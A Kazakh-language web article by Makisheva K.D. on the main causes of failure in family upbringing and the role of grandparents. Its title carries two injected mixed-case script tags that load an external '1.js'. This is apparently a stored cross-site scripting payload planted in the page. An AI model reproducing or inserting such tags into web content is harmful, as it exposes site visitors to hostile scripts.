Отбасы тәрбиесіндегі сәтсіздіктер<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.03.2020

Отбасы -сыйластық, жарастық орнаған орта, кішкентай Отан.  Отбасы мақтанышы дегенде ең бірінші мақтанышым деп ата-анамызды айтамыз. Бірақ отбасындағы тәрбиеде сәтсіздіктер өмірде көп орын алады. Отбасылық тәрбие тек ата-ана емес ата-әженің рөлі зор. Бірақ

отбасылық тәрбие бірқалыпты жағдайда іске асырылып  отырмайды. Зеттеу мәліметтеріне қарағанда отбасылық тәрбиенің сәтсіздікке ұшырауының басты себебі – үлкен адамдардың педагогикалық көзқарастарының қауқарсыздығынан болады.

Біріншіден отбасында болатын өктемдік баланы өзін-өзі билеушілігінен айырады, әрбір қадамына бақылау жасайды, ол өз күшіне мүмкіншілігіне сенімсіз және ішкі жай – күйі төмен болады.

Екіншіден  өмірде баланы еркелетушілік бетімен жіберушілік ата-аналар бәрін кешірушілік сүйіспеншілігіне байланысты. Баланың жетегіне түсіп еркіне жіберушілік өзімшілдікке тәрбиелейді.

Үшіншіден, әке мен ананың және басқа отбасы мүшелерінің тарапынан бірыңғай талаптың жоқтығы. Осының нәтижесінде ана-аларды немесе  ересек отбасы мүшелерінің көзқарастарындағы алалықты пайдаланып, бала жағымсыз нәрселерге  бейім болып өседі.

Төртіншіден, ата – аналар балаларды еркімен қарым – қатынас жасаудан, өмірден аулақтауға тырысады, бөгет жасайды. Бұл баланың қалыптасуына, дамуына  залалды  әсер етеді.

    Бесіншіден, егер әке мен ана өз баласының іс-әрекетіне немқұрайды, жауапсыздықпен қараса, онда соны пайдаланып, кездейсоқ, күмәнді адамдармен танысуға мүмкіндік алады.

Біздің халқымыздың  отбасы жағдайында жас ұрпақ тәрбиесіндегі жетекші буын ата мен әже іс-әрекетінің төңірегінде шоғырланған. Себебі, отбасында әке мен шеше негізгі еңбек иелері, отбасы қажеттілігін қамтамасыз етушілер. Ал ата мен әженің өмір тәжірибесі өз дәрежесіне даналық ақыл – ойдың, орында дүниетанымының, талғамның, денсаулық бағбанының, орынды тәртіп пен мінез құлықтық мектебі болып табылады. Жоғарыда айтылып кеткен сәтсіздіктерге ұшырамау үшін, балаларымызды дұрыс тәрбиелейік.

Макишева К.Д.

Просмотров: 581


Пікір қосу



Деректерді қолтаңбаға қосу